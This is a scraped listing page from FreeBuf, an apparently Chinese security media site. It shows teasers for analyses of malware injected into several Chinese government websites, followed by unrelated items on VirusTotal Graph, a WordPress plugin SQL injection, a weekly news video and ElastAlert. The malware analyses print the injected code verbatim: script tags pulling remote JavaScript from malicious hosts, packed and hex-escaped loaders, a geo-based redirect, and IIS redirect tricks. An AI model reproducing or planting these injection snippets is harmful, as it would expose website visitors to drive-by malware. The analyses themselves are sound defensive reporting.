FreeBuF.COM

高质量的全球互联网安全媒体平台

14969人订阅
中共盐城市委组织部网站挂马分析 中共盐城市委组织部网站挂马分析 网站名称 中共盐城市委组织部网站 网站域名 www.yczzb.gov.cn 挂马页面 http://www.yczzb.gov.cn/wibtk16208/ 挂马代码 <script src=https://www.nvvlz.com/jiechi/yczzb/sogou.js></script> 代码内容 eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.9("<0 3=\\"4/5\\" 6=\\"a://d.g.b.1.c/8/8.e?f=7\\"></0>");2.9("<0 3=\\"4/5\\" 6=\\"h://i.j.1/k/l/m.7\\"></0>");',23,23,'...
中共巴中老干部局网站挂马分析 中共巴中老干部局网站挂马分析 网站名称 中共巴中老干部局网站 网站域名 www.bzswlgbj.gov.cn 挂马页面 http://www.bzswlgbj.gov.cn/ 挂马推断 修改了IIS的配置,当HTTP状态码为302时,则在响应头中重定向至恶意地址。 恶意响应头 Location: http://www.taokkk.com/bg.html 挂马代码 <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('p r...
五莲县松柏镇人民政府网挂马分析 五莲县松柏镇人民政府网挂马分析 网站名称 五莲县松柏镇人民政府网 网站域名 www.songbaizhen.gov.cn 挂马页面 http://www.songbaizhen.gov.cn/index.asp 挂马推断 修改了IIS的配置,当HTTP状态码为301时,则在响应头中重定向至恶意地址。 恶意响应头 location: http://123.57.213.254:806 触发执行 HTTP Status Code:301 设置请求头为:Referer:http://www.baidu.com/
苏州市吴江区人民政府网站挂马分析 苏州市吴江区人民政府网站挂马分析 网站名称 苏州市吴江区人民政府网站 网站域名 www.zgwj.gov.cn 挂马页面 http://www.zgwj.gov.cn/xxxx 挂马推断 修改了IIS的配置,当HTTP状态码为404时,返回恶意页面,否则返回正常页面。 挂马代码 <script src="http://118.184.15.41/bofa.js"></script> 恶意代码 var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8ca7523b4256fdd94ee81465a0269dc6"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var jump_head = document.getElementsByTagName('head')[0]; var jump_script= d...
水泊梁山党建网挂马分析 水泊梁山党建网挂马分析 网站名称 水泊梁山党建网 网站域名 www.splsdj.gov.cn 挂马页面 http://www.splsdj.gov.cn/index.asp 挂马代码 <script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js" charset="GB2312" ></script> <script type=text/javascript> if(remote_ip_info.province =='\u5c71\u4e1c') { } else { window.location.href="http://www.jy229.com" } </script> 代码分析 通过请求网址(http://int.dpool.sina.com.cn/iplookup/iplookup.php)获取当前访客地址,若地址不为“山东”,则页面跳转至“http://www.jy229.com”。
平昌县妇联网挂马分析 平昌县妇联网挂马分析 网站名称 平昌县妇联网 网站域名 www.pcfl.gov.cn 挂马页面 http://www.pcfl.gov.cn/index.php 挂马代码 <script type="text/javascript"> window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x6a\x73\x34\x31\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); </script> 代码解密 <script type="text/javascript"> window["document"]["writ...
VirusTotal Graph增加新特性,查看各文件的相关性将更加容易 就在前几天,VirusTotal发布了一个名叫Graph的新功能,该功能允许用户以可视化的方式查看自己所提交文件之间的相关性。在这款工具的帮助下,用户可以轻松地查看到文件所连接到的主机信息,以及文件之间的相关性等等。更重要的是,这个新工具不仅会提供给VirusTotal的高级智能平台用户,而且所有VirusTotal的用户都可以它。 工具介绍 这款可视化工具基于VirusTotal的数据集实现,它可以查看到文件、URL地址、域名以及IP地址之间的关系,并且提供了非常方便的数据导航接口。 通过查看图表中的每一个节点,用户可以构建出一个数据网络来查看每一个样本之间的相关性。点击图中的节点后,你不仅可以看到每一个节点的所有相关文件或其他节点信息,你还...
WordPress插件YITH WooCommerce Wishlist SQL注入漏洞 作为我们对Sucuri防火墙定期研究审计的一部分,我们发现了一个愿望清单插件YITH WooCommerce Wishlist,存在SQL注入漏洞。据统计,该插件目前至少已被50000+的wordpress站点安装使用。 受影响范围 这个漏洞主要出现在2.2.0版本以下,主要是因为该版本缺少对用户输入数据进行严格过滤措施。攻击者(至少有一个用户帐户)可能会利用该缺陷盗取用户敏感数据,甚至通过某些配置项危害你整个的WordPress安装。 需要提醒的是在MySQL版本低于5.7的服务器中,该漏洞极易被利用。 这个漏洞有个非常有意思的地方,也是我们决定要发布该安全公告的原因,就是使用这个插件的站点通常会启用免费“用户注册”功能,以允许用户的偏好(例如愿望清单)被存储和访...
【FB TV】一周「BUF大事件」:“撒币”游戏风靡,众辅助程序各显神通;腾讯2018守护者计划大会在北京召开;一加手机网站服务器疑似被入侵 本周梗概 本周BUF大事件还是为大家带来了新鲜有趣的新闻,各种“撒币”游戏风靡,众辅助程序各显神通;腾讯2018守护者计划大会在北京召开;一加手机网站服务器疑似被入侵,用户支付信息遭泄漏。想要了解详情,请看本周的BUF大事件吧! 观看视频 看不到视频点这里 * 本文作者:willhuang,FreeBuf视频组荣誉出品,转载须注明来自FreeBuf.COM
ElastAlert监控日志告警Web攻击行为 *本文作者:shystartree,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。 由于公司需要监控web攻击行为,而因某些原因搭不了waf,才不得不用ElastAlert进行告警,此为前提。 一、ELK安装 Elasticsearch 是一个分布式、可扩展、实时的搜索与数据分析引擎。 它能从项目一开始就赋予你的数据以搜索、分析和探索的能力。 Logstash是一款轻量级的日志搜集处理框架,可以方便的把分散的、多样化的日志搜集起来,并进行自定义的处理,然后传输到指定的位置, Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看、交互存放在Elasticsearch索引里的数据,使用各种不同的图表、表格、地图等kibana能...